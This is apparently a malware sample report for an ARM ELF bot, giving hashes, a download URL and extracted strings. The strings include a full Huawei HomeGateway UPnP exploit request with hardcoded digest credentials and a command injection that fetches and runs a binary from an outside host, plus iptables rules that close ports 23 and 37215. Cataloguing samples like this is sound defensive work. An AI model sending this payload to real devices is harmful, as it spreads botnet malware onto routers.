Sample details: 709cf51291a6bfffcfc221e27c5c7d59 --

Hashes
MD5: 709cf51291a6bfffcfc221e27c5c7d59
SHA1: adbbeed0d9f11697073fd9fd6416094e18866976
SHA256: 316f3283386a76374c235792c51ddbf3a94bdfb5e4b4c8b8538d37ea606b137d
SSDEEP: 1536:lg2537uPcEpoK3rmodPNRCeaem5Vt/kL:lgO371K1/dlm5V2
Details
File Type: ELF
Yara Hits
Source
http://185.62.190.159/bins/arm5.idopoc
Strings
		/lib/ld-uClibc.so.0
libc.so.0
strcpy
connect
sigemptyset
memmove
getpid
memcpy
readlink
system
malloc
__udivsi3
recvfrom
socket
select
readdir
sigaddset
accept
calloc
__umodsi3
inet_addr
setsockopt
signal
sendto
realloc
listen
__aeabi_ldiv0
__uClibc_main
memset
__div0
__aeabi_uidiv
getppid
opendir
getsockopt
__aeabi_uidivmod
__errno_location
__modsi3
__aeabi_idiv0
__data_start
setsid
closedir
sigprocmask
getsockname
_edata
__bss_start
__bss_start__
__bss_end__
__end__
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
.shstrtab
.interp
.dynsym
.dynstr
.rel.plt
.rodata
.ctors
.dtors
.dynamic